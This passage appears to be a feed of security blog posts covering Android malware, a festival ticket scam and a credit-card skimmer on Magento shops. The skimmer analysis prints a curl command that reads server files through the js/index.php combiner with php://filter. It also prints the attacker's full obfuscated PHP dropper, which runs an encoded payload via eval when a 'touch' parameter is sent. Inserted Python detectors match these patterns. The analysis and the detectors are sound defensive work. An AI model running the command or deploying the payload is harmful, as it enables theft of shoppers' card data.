LeifAccess (also known as Shopper) is an Android-based malware distributed through social media, gaming platforms, and fraudulent advertising. Once installed, this stealthy malware hides its icon and displays fake security notifications, hoping to trick the user into granting the malware accessibility access. LeifAccess/Shopper has also been found to use third-party logins to cheat app ranking systems and wreak more havoc on victims’ devices. The malware uses the accessibility features in Android to quietly create third-party accounts, automatically download apps from Google Play, and post reviews using names and emails configured on the victim’s device.

According to the Mobile Threat Report, hackers are also tricking users into installing adware onto their devices, redirecting them to a variety of fraudulent ads. Because digital ad revenue is simply based on screens displayed and clicks, hackers are quick to exploit this threat so they can collect fraudulent ad revenue at the expense of unsuspecting users. Due to the volume and speed of the redirects, many consumers don’t even realize that their device is infected or that their data is being collected.

HiddenAds

HiddenAds masquerades as genuine apps like Call of Duty, Spotify, and FaceApp to trick users into downloading them. But once the app is installed on the victim’s device, the app icon changes to one that mimics the Settings icon. When the victim clicks on it, the app displays a fake error message that reads “Application is unavailable in your country. Click OK to uninstall.” However, clicking OK completes the malicious app installation process and then hides the fake Settings icon, making it nearly impossible to find and delete the malware.

MalBus

McAfee researchers also discovered a new targeted attack hidden in a legitimate South Korean transit app. Called MalBus, this new attack method exploits the app developer’s hacked Google Play account. Once the hackers accessed the developer’s account, they added an additional library to the apps and uploaded them to Google Play. Now, MalBus spyware can phish for credentials with a local webpage that mimics the real Google login screen. Additionally, MalBus can drop a malicious trojan on the victim’s device, searching for specific military or political keywords. If these keywords are found, the victim’s matching files are uploaded to a remote server without their knowledge.

How to Stay Protected

As hackers continue to target consumers through the channels they spend the most time on – their mobile devices – it’s important for users to reflect on the current digital landscape to help protect their data, as well as their family and friends. Follow these security tips to defend against stealthy mobile threats:

  • Do your research. While some malicious apps do make it through the app store screening process, the majority of attack downloads appear to be coming from social media, fake ads, and other unofficial app sources. Before downloading an app to your device, do some quick research about the source and developer.
  • Read app reviews with a critical eye. Reviews and rankings are still a good method of determining whether an app is legitimate. However, watch out for reviews that reuse simple or repetitive phrases, as this could be a sign of a fraudulent review.
  • Update, update, update. Developers are actively working to identify and address security issues. Frequently update your operating systems and apps so that they have the latest fixes and security protections.
  • Use a VPN. A virtual private network, or VPN, allows you to send and receive data across a public network, but it encrypts your information so others can’t read it. This can prevent hackers from spying on your internet activity, therefore protecting your privacy.
  • Keep tabs on your accounts. Use ID monitoring tools to be aware of changes or actions that you did not make. These may have been caused by malware and could indicate that your phone or account has been compromised.
  • Defend your devices with security software. Comprehensive security software across all devices continues to be a strong defensive measure to protect your data and privacy from online threats.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Mobile Malware Playing Hide and Steal on Your Device? appeared first on McAfee Blogs.

Burning Man Is Coming: How to Watch out for Ticket Scammers

As the winter months fade and spring begins to creep up, many millennials and Gen Zers set their sights on festival season. Whether they plan on attending Coachella, Stagecoach, Outside Lands, Lollapalooza, or Governor’s Ball, festivalgoers across the world anxiously begin to look for cheap or discounted tickets in the hope of enjoying these events as affordably as possible. This eagerness, however, provides scammers with an opportunity to scam attendees out of hundreds of dollars, as well as the experiences themselves. In fact, according to Threatpost, ticket scammers have recently set their sights on wishful Burning Man attendees.

How This Burning Man Scam Works

The dystopian, futuristic festival that is Burning Man takes place in late August through early September, attracting tens of thousands of people from around the world and all walks of life. While truly an immersive experience, the festival can be quite expensive. So, it’s no wonder that burners – the nickname given to festival attendees – would be eager to find the cheapest price for their tickets. With this scam in particular, fake Burning Man concert organizers are offering passes in what researchers say is a very convincing and sophisticated effort. These tricksters have set up a fake website that closely mimics the official Burning Man site to fool visitors into thinking it’s the real deal.

How to Stay Secure

Seasoned festivalgoers know that ticket scammers are out there. But as the traps become more sophisticated, it’s vital that they know how to spot “too good to be true” deals. To avoid being burned by tricksters, follow these tips:

  • Only buy tickets from reputable vendors. While purchasing a cheap ticket from a third-party vendor is tempting, buying a ticket from the actual festival site rather than one that offers a good deal is the way to go. If not, you risk not only losing money but also the festival experience.
  • Carefully inspect any site before entering payment details. Burning Man’s official website features event history, an invitation to collaborate, press releases, archives from past festivals, and more – so make sure to scan for a variety of pages to confirm that the site is the real deal. Adding to that, be sure to also inspect URLs for suspicious characters.
  • Use payment that’s protected. If for some reason you do fall victim to a scam, most credit card companies help you get your money back in the event of fraud. Additionally, PayPal offers buyer protection when paying for “Goods or Services” that allows you to request a chargeback, as long as you don’t pay as “friends and family,” which carries no buyer protection.
  • Monitor your online accounts. You’re never too young to start monitoring your credit! Be sure to regularly inspect your account for suspicious activity. If you do suspect your data or account has been compromised, place a fraud alert on your credit.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Burning Man Is Coming: How to Watch out for Ticket Scammers appeared first on McAfee Blogs.

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of interest to you. Defending our financial assets is always one of the top priorities of the cybersecurity community; on the other side of the coin, it is one of the most attractive attacks for cyber-criminals seeking to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not one hundred percent sure that the discovered implant is an evolution of Magecart, since the activation scripts are quite different even though they do use the Magento core infrastructure. To my current understanding we might be facing a new Magecart version or a new framework altogether; notes and suggestions are always welcome.

Disclaimer

National law enforcement units have been alerted, and a few hours have passed since they gave me authorization to publish this post. If you used your credit card on one of the following eCommerce sites (see the IoC section), consider your card no longer private: call your bank and follow the deactivation steps. Since the C2 and relays are still up and running, their addresses have been obfuscated to avoid replication. I want to thank Daniele B. for giving me the first “wired eCommerce”.

Analysis

Everything starts from a vulnerable eCommerce website. The user doesn’t notice anything strange: she adds items to her cart as usual, browses from page to page viewing and selecting items, and finally decides to check out, either by registering a new account or by proceeding as a guest. However, the attacker can abuse the eCommerce vulnerabilities to inject a malicious JavaScript that sends information (for example: name, address, email, credit card number, CVV, expiration date, and so on) to another host belonging to the cyber criminal. The following picture illustrates the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see a foreign connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.]php . This POST carries a rather interesting payload, partially shown (to avoid leaking information) in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands on an external gate hosted on *****.]com. This is a slightly different behavior compared to the original Magecart, which used to send data directly in base64 format. Mykada looks like a legitimate eCommerce website that has been compromised and used as a relay (one more difference from Magecart). A further investigation of this relay shows a Magento core installation (a common indicator for Magecart) which includes js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php), a tool that dynamically builds a composite JavaScript file to boost performance and compression rates. By using this public Magento core functionality and by guessing file paths (looking for known public folders on the host helps in guessing paths), we can obtain the original malicious back-end file injected by the attacker.
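The combiner abuse just described also leaves a trace on the relay host itself: every such read appears in the web server’s access log as a request to js/index.php whose f parameter is not a list of relative .js files, and the skimmer back end appears as a PHP script under /js/ receiving requests that carry the touch parameter. The Python below is an added example, not the author’s monitoring script nor code from the page; it parses a few constructed combined-format log lines (IPs, timestamps and the referrer host are invented) and flags both shapes. The allow-list it applies to the f parameter is this example’s own assumption about the combiner’s intended use.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/Nginx combined log format. IPs, timestamps and
# the referrer host are invented; only the path shapes (js/index.php?f=..., a .php
# script under /js/ar/, the "touch" parameter) come from the analysis above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2020:10:01:02 +0000] "GET /js/index.php?f=prototype/prototype.js,lib/ccard.js HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2020:10:02:17 +0000] "GET /js/index.php?f=php://filter/convert.base64-encode/resource=/var/www/html/js/ar/ar906.php HTTP/1.1" 200 90210 "-" "curl/7.68.0"
198.51.100.7 - - [10/Jun/2020:10:03:44 +0000] "POST /js/ar/ar2497.php HTTP/1.1" 200 12 "https://victim-shop.example/checkout/" "Mozilla/5.0"
198.51.100.8 - - [10/Jun/2020:10:04:01 +0000] "GET /js/ar/ar2497.php?touch=86f637 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2020:10:05:30 +0000] "GET /js/index.php?f=../app/etc/local.xml HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def combiner_entry_is_safe(entry):
    """The legitimate use of js/index.php is to merge relative *.js paths under js/.
    Anything else (a stream wrapper, an absolute path, a parent-directory hop or a
    non-.js file) is treated as a file read. This allow-list is the example's own
    assumption, not a rule taken from the combiner's source."""
    entry = unquote(entry).strip()
    if "://" in entry or entry.startswith("/") or ".." in entry.split("/"):
        return False
    return entry.lower().endswith(".js")


def classify(rec):
    """Return the list of detection names that fire for one parsed request."""
    hits = []
    path, query = rec["path"], rec["query"]
    if path.endswith("/js/index.php"):
        entries = [e for f in query.get("f", []) for e in f.split(",")]
        if any(not combiner_entry_is_safe(e) for e in entries):
            hits.append("js_combiner_file_read")
    elif path.startswith("/js/") and path.endswith(".php"):
        # Magento keeps static assets under js/; a PHP script there is not expected.
        hits.append("php_script_under_js")
        if "touch" in query:
            hits.append("skimmer_activation_param")
    return hits


def scan(log_text):
    """Run classify() over every parseable line; return (ip, method, target, hits) tuples."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append((rec["ip"], rec["method"], rec["target"], hits))
    return findings


if __name__ == "__main__":
    for ip, method, target, hits in scan(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {', '.join(hits)}")
```

Of the five constructed lines only the first is benign; the other four are flagged. A POST's body is not in the access log, so the POST to the script under /js/ar/ is flagged on its path alone, while the GET variant is additionally flagged on its touch parameter.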

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

<?php 
if(isset($_GET['touch']))
$_POST['touch']=$_GET['touch'];

eval(gzuncompress(base64_decode('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')));

We are now facing the initial stage of obfuscated PHP code. The following image (Fig2) shows how the attacker obfuscated the first stage. Note the activation variable “touch”, which triggers the process in both flavors, GET and POST. Once the activation variable is found, a compressed and encoded payload is assembled through a chain of variable concatenations and then executed (eval).
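A Magento operator who wants to find files like the one above on disk does not need to decode the payload: the stage-1 shape itself (an activation key copied from $_GET into $_POST, and eval() fed by a chain of decompress/decode calls over one very long literal) is enough to flag a file for review. The Python below is an added example, not the author’s tooling nor code from the page; its patterns and the 512-character literal threshold are its own assumptions, and the two PHP samples it scans are constructed (the “dropper” keeps only the shape of the page’s stage 1, with filler in place of the real blob).

```python
import os
import re
import tempfile

# Shape of the stage-1 dropper described above: an activation key copied from $_GET
# into $_POST, and eval() fed by a chain of decode/decompress calls over one long
# encoded literal. The patterns and thresholds are this example's own assumptions,
# not a published signature.
ACTIVATION_RE = re.compile(
    r"isset\(\s*\$_(GET|POST|REQUEST|COOKIE)\[\s*['\"](\w+)['\"]\s*\]\s*\)"
)
EVAL_DECODE_RE = re.compile(
    r"eval\s*\(\s*(?:(?:gzuncompress|gzinflate|gzdecode|base64_decode|str_rot13|strrev)\s*\(\s*){2,}",
    re.IGNORECASE,
)
LONG_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{512,})['\"]")


def indicators(php_source):
    """Return the indicator names found in one PHP source string (empty = nothing seen)."""
    found = []
    m = ACTIVATION_RE.search(php_source)
    if m:
        key = re.escape(m.group(2))
        # the same key being copied between $_GET and $_POST is the trigger idiom
        copy_re = re.compile(
            r"\$_(?:POST|GET)\[\s*['\"]" + key + r"['\"]\s*\]\s*=\s*"
            r"\$_(?:GET|POST)\[\s*['\"]" + key + r"['\"]\s*\]"
        )
        if copy_re.search(php_source):
            found.append("activation_param_copy:" + m.group(2))
    if EVAL_DECODE_RE.search(php_source):
        found.append("eval_of_decoded_blob")
    if LONG_LITERAL_RE.search(php_source):
        found.append("long_encoded_literal")
    return found


def is_stage1_dropper(php_source):
    """eval() over a decoded blob is the indicator that justifies review on its own."""
    return "eval_of_decoded_blob" in indicators(php_source)


def scan_tree(root):
    """Walk a webroot and map every .php file with at least one indicator to its list."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    inds = indicators(fh.read())
            except OSError:
                continue
            if inds:
                report[full] = inds
    return report


# Constructed samples. The "dropper" keeps only the shape of the page's stage 1; the
# literal is filler ("QUFB" repeated), not a real payload.
DROPPER_SAMPLE = (
    "<?php\n"
    "if(isset($_GET['touch']))\n"
    "$_POST['touch']=$_GET['touch'];\n"
    "eval(gzuncompress(base64_decode('" + "QUFB" * 300 + "')));\n"
)
BENIGN_SAMPLE = (
    "<?php\n"
    "// ordinary request handling: reads a key, decodes a short literal, never eval()s\n"
    "$f = isset($_GET['f']) ? $_GET['f'] : '';\n"
    "echo base64_decode('aGVsbG8=') . htmlspecialchars($f);\n"
)


def demo_scan_tree():
    """Write both samples into a throwaway webroot, scan it, and return relative results."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "js", "ar"))
    with open(os.path.join(root, "js", "ar", "ar2497.php"), "w") as fh:
        fh.write(DROPPER_SAMPLE)
    with open(os.path.join(root, "js", "index.php"), "w") as fh:
        fh.write(BENIGN_SAMPLE)
    return {os.path.relpath(p, root).replace(os.sep, "/"): v
            for p, v in scan_tree(root).items()}


if __name__ == "__main__":
    for path, inds in sorted(demo_scan_tree().items()):
        print(path, "->", ", ".join(inds))
```

Run against a real webroot, scan_tree() is a triage filter rather than a verdict: the benign sample shows why the activation-key copy and the long literal are reported separately, since reading a request key or decoding a short literal is ordinary PHP, while eval() over a decode chain is what warrants pulling the file for analysis.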

Fig2: Payload Stage 1

By following the obfuscation chain in reverse we end up with the following code (Fig3). This time the attacker used more obfuscation techniques, from charset differentiation and junk code to randomly scattered comments, making the whole thing quite hard to read. But by taking my time, ordering every single line, substituting variables and re-encoding with my favorite charset, I was able to extract the decoding loop and quickly understand the payload behavior.

Fig3: Payload Stage 3

